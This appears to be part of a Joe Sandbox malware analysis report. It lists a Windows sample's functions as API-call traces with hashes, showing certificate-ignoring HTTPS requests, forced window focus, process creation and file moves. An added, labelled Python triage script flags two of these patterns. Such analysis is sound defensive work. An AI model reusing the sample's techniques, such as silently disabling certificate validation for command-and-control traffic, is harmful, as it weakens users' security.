• @_EH4_CallFilterFunc@8.LIBCMT ref: 0051ACED
• GetStartupInfoW.KERNEL32(?,005A6E28,00000064,00515E91,005A6C70,00000014), ref: 0051AD46
• __calloc_crt.LIBCMT ref: 0051AD91
• GetFileType.KERNEL32(00000001), ref: 0051ADD8
• InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0051AE11
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                  • String ID:
                                                                                  • API String ID: 1426640281-0
                                                                                  • Opcode ID: ee37788e1f6fdf44e39a95b3aa257f17c6055332ffadc4a377f4d94a8a993320
                                                                                  • Instruction ID: 54ff533d084f9f8ffe8f705a1c108ca2d386ffac2e62010aa4ae2e154be183c8
                                                                                  • Opcode Fuzzy Hash: ee37788e1f6fdf44e39a95b3aa257f17c6055332ffadc4a377f4d94a8a993320
                                                                                  • Instruction Fuzzy Hash: 2181DF709022458FEB21CF68C8845E9BFF4BF45320B24475DE4A6AB3D1C7349883DB52
                                                                                  APIs
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00534047
                                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,005330A5,?,00000001), ref: 0053405B
                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00534062
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,005330A5,?,00000001), ref: 00534071
                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00534083
                                                                                  • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,005330A5,?,00000001), ref: 0053409C
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,005330A5,?,00000001), ref: 005340AE
                                                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,005330A5,?,00000001), ref: 005340F3
                                                                                  • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,005330A5,?,00000001), ref: 00534108
                                                                                  • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,005330A5,?,00000001), ref: 00534113
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                  • String ID:
                                                                                  • API String ID: 2156557900-0
                                                                                  • Opcode ID: 7e8662b1619ec5ba80c86e93dfa3c6284295746600d7c58f0aea96224fed24f2
                                                                                  • Instruction ID: 44439bbab7c023bf5f5e71025c8c60bc789eec3a8da40c518f70187fe48a83c9
                                                                                  • Opcode Fuzzy Hash: 7e8662b1619ec5ba80c86e93dfa3c6284295746600d7c58f0aea96224fed24f2
                                                                                  • Instruction Fuzzy Hash: 94318E71600614ABDB50DB94EC89B797FB9BF64311F108115F909A6290CBB4BE88EF60
                                                                                  APIs
                                                                                  • GetSysColor.USER32(00000008), ref: 0050B496
                                                                                  • SetTextColor.GDI32(?,000000FF), ref: 0050B4A0
                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0050B4B5
                                                                                  • GetStockObject.GDI32(00000005), ref: 0050B4BD
                                                                                  • GetClientRect.USER32(?), ref: 0056DD63
                                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 0056DD7A
                                                                                  • GetWindowDC.USER32(?), ref: 0056DD86
                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 0056DD95
                                                                                  • ReleaseDC.USER32(?,00000000), ref: 0056DDA7
                                                                                  • GetSysColor.USER32(00000005), ref: 0056DDC5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3430376129-0
                                                                                  • Opcode ID: d20193b2fc98e3de72a36a0cc6fa3cb6c2666bb76daf489ab1f17128f68ee2e5
                                                                                  • Instruction ID: c2493be42aa797325e809b40ad80e2c417f954fe18b23cbd0a65835fe5bb3a85
                                                                                  • Opcode Fuzzy Hash: d20193b2fc98e3de72a36a0cc6fa3cb6c2666bb76daf489ab1f17128f68ee2e5
                                                                                  • Instruction Fuzzy Hash: 53113D31500205AFDB516B64EC48BA97F75FF14325F504625FA6AA50E1CB320985FB20
                                                                                  APIs
                                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 004F30DC
                                                                                  • CoUninitialize.OLE32(?,00000000), ref: 004F3181
                                                                                  • UnregisterHotKey.USER32(?), ref: 004F32A9
                                                                                  • DestroyWindow.USER32(?), ref: 00565079
                                                                                  • FreeLibrary.KERNEL32(?), ref: 005650F8
                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00565125
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                  • String ID: close all
                                                                                  • API String ID: 469580280-3243417748
                                                                                  • Opcode ID: 89129bea72350bfd3012c39ceef579c7957e4a6900240daaa2d042b32f23245d
                                                                                  • Instruction ID: 7fc3457637bf5f3b3919b6820bf5997ee4270e3534c17f0313cc6b5c39072979
                                                                                  • Opcode Fuzzy Hash: 89129bea72350bfd3012c39ceef579c7957e4a6900240daaa2d042b32f23245d
                                                                                  • Instruction Fuzzy Hash: D5914B3420010A8FC705EF15D999A79F7B4FF15309F5082AEE60A67262DF34AE5ACF58
                                                                                  APIs
                                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 0050CC15
                                                                                    • Part of subcall function 0050CCCD: GetClientRect.USER32(?,?), ref: 0050CCF6
                                                                                    • Part of subcall function 0050CCCD: GetWindowRect.USER32(?,?), ref: 0050CD37
                                                                                    • Part of subcall function 0050CCCD: ScreenToClient.USER32(?,?), ref: 0050CD5F
                                                                                  • GetDC.USER32 ref: 0056D137
                                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0056D14A
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0056D158
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0056D16D
                                                                                  • ReleaseDC.USER32(?,00000000), ref: 0056D175
                                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0056D200
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                  • String ID: U
                                                                                  • API String ID: 4009187628-3372436214
                                                                                  • Opcode ID: 03a07ac00a96308359504d6fbc2de552fd4bbef3921970e4ba62ca72355eaf5b
                                                                                  • Instruction ID: ba1c790c2214a3a7fe20dfd8305492338ab9736258987c210a89c4eba18e02cb
                                                                                  • Opcode Fuzzy Hash: 03a07ac00a96308359504d6fbc2de552fd4bbef3921970e4ba62ca72355eaf5b
                                                                                  • Instruction Fuzzy Hash: C2710330A00205DFCF218F64C895AAE7FB1FF5A320F184A6AED555B2A5D7308C41DF60
                                                                                  APIs
                                                                                    • Part of subcall function 0050B34E: GetWindowLongW.USER32(?,000000EB), ref: 0050B35F
                                                                                    • Part of subcall function 0050B63C: GetCursorPos.USER32(000000FF), ref: 0050B64F
                                                                                    • Part of subcall function 0050B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0050B66C
                                                                                    • Part of subcall function 0050B63C: GetAsyncKeyState.USER32(00000001), ref: 0050B691
                                                                                    • Part of subcall function 0050B63C: GetAsyncKeyState.USER32(00000002), ref: 0050B69F
                                                                                  • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0055ED3C
                                                                                  • ImageList_EndDrag.COMCTL32 ref: 0055ED42
                                                                                  • ReleaseCapture.USER32 ref: 0055ED48
                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 0055EDF0
                                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0055EE03
                                                                                  • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0055EEDC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                  • API String ID: 1924731296-2107944366
                                                                                  • Opcode ID: cc679a3e6a40d7381db3e5d1b708550be56c00ddbe8f2802d488a40db7800c65
                                                                                  • Instruction ID: 8b7be02908263f35a1a2bba01c663fa91bac806fede1152a877f7bf38f77287f
                                                                                  • Opcode Fuzzy Hash: cc679a3e6a40d7381db3e5d1b708550be56c00ddbe8f2802d488a40db7800c65
                                                                                  • Instruction Fuzzy Hash: B751AA30104304AFD714DF20DCAAF6A7BF8FB98704F504A1EF985962E2DB70A948DB52
                                                                                  APIs
                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 005445FF
                                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0054462B
                                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0054466D
                                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00544682
                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0054468F
                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 005446BF
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00544706
                                                                                    • Part of subcall function 00545052: GetLastError.KERNEL32(?,?,005443CC,00000000,00000000,00000001), ref: 00545067
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                  • String ID:
                                                                                  • API String ID: 1241431887-3916222277
                                                                                  • Opcode ID: d06d63bbdc7b16d3a6a822a03873548029ec6e64a4286a547039f421835c7cd1
                                                                                  • Instruction ID: 8deb6b3cd2093da075d69e338f887091315ad256fb664680f89c1ea0212b8d03
                                                                                  • Opcode Fuzzy Hash: d06d63bbdc7b16d3a6a822a03873548029ec6e64a4286a547039f421835c7cd1
                                                                                  • Instruction Fuzzy Hash: 87418BB1541209BFEB069F50DC89FFA7BACFF09358F00401AFA059A181EBB099449BA4
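Added example, not code from Joe Sandbox or from the analysed sample: a small parser for the "APIs" lines in these function entries, with two checks a triager would want over this page's data. For the WinINet entry above (InternetConnectW at 005445FF), it decodes the InternetSetOptionW arguments: option 0x1F is INTERNET_OPTION_SECURITY_FLAGS and 0x100 is SECURITY_FLAG_IGNORE_UNKNOWN_CA (values from wininet.h), so the function sends its HTTPS request with unknown-CA errors ignored, which is why the InternetQueryOptionW/InternetSetOptionW pair around the request matters. For the entry at 00534047 it recognises the GetForegroundWindow followed by AttachThreadInput(..., fAttach=TRUE) sequence, the input-queue attach used to force focus onto a window. Assumptions: the third printed value for InternetSetOptionW is the DWORD the plugin resolved behind the lpBuffer pointer rather than the pointer itself, and the two sample entries embedded below are copied from this report and are the only input the script sees.

```python
"""Parse the 'APIs' lines of Joe Sandbox IDA-plugin function entries and flag
call patterns worth a triager's attention. Added example; not Joe Sandbox code."""
import re
from dataclasses import dataclass
from typing import List, Optional, Union

Arg = Union[int, str, None]   # hex value, string literal, or None for an unknown '?'

# Matches the three line shapes that occur in the entries:
#   • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00544682
#   • __lock.LIBCMT ref: 0051ACC1
#   • Part of subcall function 00517CF4: EnterCriticalSection.KERNEL32(...), ref: 00517D1F
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w@]+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]
    ref: int                          # call-site address
    subcall_of: Optional[int] = None  # set for 'Part of subcall function' lines

def _parse_arg(raw: str) -> Arg:
    raw = raw.strip()
    if raw == "?":
        return None
    try:
        return int(raw, 16)
    except ValueError:
        return raw                    # a string literal such as 'close all'

def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [_parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16),
                             int(m["sub"], 16) if m["sub"] else None))
    return calls

# Constants from wininet.h.
INTERNET_OPTION_SECURITY_FLAGS = 0x1F
SECURITY_FLAG_NAMES = {
    0x0080: "SECURITY_FLAG_IGNORE_REVOCATION",
    0x0100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x0200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x1000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x2000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
}

def tls_validation_flags(calls: List[ApiCall]) -> List[str]:
    """Certificate checks switched off via InternetSetOptionW(INTERNET_OPTION_SECURITY_FLAGS).
    Assumption: the third printed argument is the DWORD the plugin resolved behind lpBuffer."""
    names: List[str] = []
    for c in calls:
        if c.api != "InternetSetOptionW" or c.module != "WININET" or len(c.args) < 3:
            continue
        if c.args[1] == INTERNET_OPTION_SECURITY_FLAGS and isinstance(c.args[2], int):
            names += [n for bit, n in SECURITY_FLAG_NAMES.items() if c.args[2] & bit]
    return names

def attaches_to_foreground_input(calls: List[ApiCall]) -> bool:
    """True when a function locates the foreground window and then calls
    AttachThreadInput(..., fAttach=TRUE): the input-queue attach used to force focus."""
    seen_foreground = False
    for c in calls:
        if c.api == "GetForegroundWindow":
            seen_foreground = True
        elif seen_foreground and c.api == "AttachThreadInput" and len(c.args) >= 3 and c.args[2] == 1:
            return True
    return False

def triage(entry: str) -> dict:
    calls = parse_api_lines(entry)
    return {"calls": len(calls),
            "tls_flags_ignored": tls_validation_flags(calls),
            "foreground_input_attach": attaches_to_foreground_input(calls)}

# Constructed sample input: two 'APIs' lists copied from this report's function entries.
WININET_ENTRY = """\
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 005445FF
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0054462B
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0054466D
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00544682
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0054468F
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 005446BF
• InternetCloseHandle.WININET(00000000), ref: 00544706
  • Part of subcall function 00545052: GetLastError.KERNEL32(?,?,005443CC,00000000,00000000,00000001), ref: 00545067
"""
FOCUS_ENTRY = """\
• GetCurrentThreadId.KERNEL32 ref: 00534047
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,005330A5,?,00000001), ref: 0053405B
• GetWindowThreadProcessId.USER32(00000000), ref: 00534062
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,005330A5,?,00000001), ref: 00534071
"""

if __name__ == "__main__":
    for name, entry in (("wininet@005445FF", WININET_ENTRY), ("focus@00534047", FOCUS_ENTRY)):
        print(name, triage(entry))
```

The flag table is deliberately the full SECURITY_FLAG_IGNORE_* set rather than just 0x100, so the same check reports a sample that clears CN, date or revocation checks as well; a value of 0x100 alone means only the unknown-CA check is suppressed, which is enough for a self-signed or privately issued certificate on the C2 side to pass.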
                                                                                  APIs
                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0058DC00), ref: 0054B715
                                                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0058DC00), ref: 0054B749
                                                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0054B8C1
                                                                                  • SysFreeString.OLEAUT32(?), ref: 0054B8EB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                  • String ID:
                                                                                  • API String ID: 560350794-0
                                                                                  • Opcode ID: 4f072a72504d12cc8a5dc90c90da572ed987a01364c34003756f096fb8b66201
                                                                                  • Instruction ID: 8839673ee053458b25cefc82d903da3294ceaffe91d3451e0a636e0ef9ab0a53
                                                                                  • Opcode Fuzzy Hash: 4f072a72504d12cc8a5dc90c90da572ed987a01364c34003756f096fb8b66201
                                                                                  • Instruction Fuzzy Hash: F3F1F975A00109AFDB04DF94C888EEEBBB9FF89319F148459E905AB250DB31EE45DB50
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 005524F5
                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00552688
                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 005526AC
                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 005526EC
                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0055270E
                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0055286F
                                                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 005528A1
                                                                                  • CloseHandle.KERNEL32(?), ref: 005528D0
                                                                                  • CloseHandle.KERNEL32(?), ref: 00552947
                                                                                  Similarity
                                                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                  • String ID:
                                                                                  • API String ID: 4090791747-0
                                                                                  • Opcode ID: c2ba26798aea79a68bac1065c0e07fd57d7184dbcfdb222c84e8062807e72ebf
                                                                                  • Instruction ID: c8e1d44412c490df982e3d0f23b1906968431b54340da1df8f84e5863a6ed417
                                                                                  • Opcode Fuzzy Hash: c2ba26798aea79a68bac1065c0e07fd57d7184dbcfdb222c84e8062807e72ebf
                                                                                  • Instruction Fuzzy Hash: 1DD1AE35604201DFCB14EF24C8A5A6EBFE1BF89314F14895EF9899B2A2DB31DC45CB52
                                                                                  APIs
                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0055B3F4
                                                                                  Similarity
                                                                                  • API ID: InvalidateRect
                                                                                  • String ID:
                                                                                  • API String ID: 634782764-0
                                                                                  • Opcode ID: 548bffe0ee1630b369dc592a15398a4de9e795e3f52ec4372d7dbd56876b0924
                                                                                  • Instruction ID: 4a36def8998d4b03585fd3212aa8daa897e2329916944954c714aad06f9d1784
                                                                                  • Opcode Fuzzy Hash: 548bffe0ee1630b369dc592a15398a4de9e795e3f52ec4372d7dbd56876b0924
                                                                                  • Instruction Fuzzy Hash: 1751AE30500205EAFF349E288CADBAD7F75BB04316F644513FE15E61E2E771AA889A50
                                                                                  APIs
                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0056DB1B
                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0056DB3C
                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0056DB51
                                                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0056DB6E
                                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0056DB95
                                                                                  • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0050A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0056DBA0
                                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0056DBBD
                                                                                  • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0050A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0056DBC8
                                                                                  Similarity
                                                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 1268354404-0
                                                                                  • Opcode ID: 1822a41b95aac0179b8f8e51b4af2e2f03ceecea950417913602b3824c3b7c79
                                                                                  • Instruction ID: 241a76fc803b6ec7e675dfa336435f78a3031d928cf1aa1d5e88f3ec7f4f816f
                                                                                  • Opcode Fuzzy Hash: 1822a41b95aac0179b8f8e51b4af2e2f03ceecea950417913602b3824c3b7c79
                                                                                  • Instruction Fuzzy Hash: 5D514B70A00709EFDB20DF65CC95FAA7BB5FB58750F104A19F946972E0D7B0A980DB60
                                                                                  APIs
                                                                                    • Part of subcall function 00536EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00535FA6,?), ref: 00536ED8
                                                                                    • Part of subcall function 00536EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00535FA6,?), ref: 00536EF1
                                                                                    • Part of subcall function 005372CB: GetFileAttributesW.KERNEL32(?,00536019), ref: 005372CC
                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 005375CA
                                                                                  • _wcscmp.LIBCMT ref: 005375E2
                                                                                  • MoveFileW.KERNEL32(?,?), ref: 005375FB
                                                                                  Similarity
                                                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                  • String ID:
                                                                                  • API String ID: 793581249-0
                                                                                  • Opcode ID: ba9b946502d5f9fa2f62a1186cd7bd9fea3d0e366bde2301884dd0e928d8be23
                                                                                  • Instruction ID: e60b978ce8621ec4d0139e8487154899b8535774e1c0fdfa431019694359244c
                                                                                  • Opcode Fuzzy Hash: ba9b946502d5f9fa2f62a1186cd7bd9fea3d0e366bde2301884dd0e928d8be23
                                                                                  • Instruction Fuzzy Hash: 0B510EB2E0921D5ADF64EB94D8859DEB7BCAF4C310F0044AAF609E3141EA7496C9CF64
                                                                                  APIs
                                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0056DAD1,00000004,00000000,00000000), ref: 0050EAEB
                                                                                  • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0056DAD1,00000004,00000000,00000000), ref: 0050EB32
                                                                                  • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0056DAD1,00000004,00000000,00000000), ref: 0056DC86
                                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0056DAD1,00000004,00000000,00000000), ref: 0056DCF2
                                                                                  Similarity
                                                                                  • API ID: ShowWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1268545403-0
                                                                                  • Opcode ID: e26d57d3b3d8fe40b5152dd4a85f3280c84f6d7a932ba08fa16883031148e5e5
                                                                                  • Instruction ID: 80bf24e2db7a55a604076dd2d708419ea8b227e89034b7037ad216aa3f24c009
                                                                                  • Opcode Fuzzy Hash: e26d57d3b3d8fe40b5152dd4a85f3280c84f6d7a932ba08fa16883031148e5e5
                                                                                  • Instruction Fuzzy Hash: 5941B4707056849AD77A4B289D8FB7E7EA5BF55304F790C09E04B879E1C670BC84E721
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0052AEF1,00000B00,?,?), ref: 0052B26C
                                                                                  • HeapAlloc.KERNEL32(00000000,?,0052AEF1,00000B00,?,?), ref: 0052B273
                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0052AEF1,00000B00,?,?), ref: 0052B288
